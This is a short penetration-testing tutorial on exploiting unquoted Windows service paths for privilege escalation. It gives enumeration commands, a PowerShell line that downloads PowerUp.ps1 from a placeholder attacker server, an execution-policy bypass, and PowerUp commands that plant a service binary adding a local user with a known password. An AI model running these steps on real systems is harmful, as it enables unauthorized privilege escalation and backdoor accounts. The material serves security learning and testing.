Unquoted Service Paths
This attack relies on windows find an executable path when it's Unquoted.
Introduction
When the service starts the CreateProcess
function execute, this function receives as a parameter lpApplicationName
which is used to specify the path of the binary file.
If the provided path is unquoted and include space, Then the windows service will interpreted it in various ways.
For example the path C:\Program Files\program folder\binary.exe
will used in the following order:
C:\Program.exe
C:\Program Files\program.exe
C:\Program Files\program folder\binary.exe
Enumeration
Searching for vulnerable services:
Get-CimInstance -ClassName win32_service | Select Name,State,PathName
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
Checking permission to create files in execute paths:
icacls "<path>"
The table below describes the permissions definitions icacls
results:
F
Full access
M
Modify access
RX
Read and execute access
R
Read-only access
W
Write-only access
Exploit
The process is pretty similar to Service Binary Hijacking
Automated Process
It is possible to automate the process using well known tool called PowerUp
from PowerSploit
Collection:
Downloading PowerUp.ps1:
iwr -uri http://<attacker_http_server>/PowerUp.ps1 -Outfile PowerUp.ps1
Bypassing Execution Policy:
powershell -ep bypass
Importing PowerUp.ps1:
. .\PowerUp.ps1
Enumerate services with unquoted paths:
Get-UnquotedService
Exploiting by creating a malicious binary (the default behavior is to create a new local user called john with the password Password123!)
Write-ServiceBinary -Name '<service_name>' -Path "<binary_path>"
Triggering the exploit by restarting the service
Restart-Service <service_name>
References
Last updated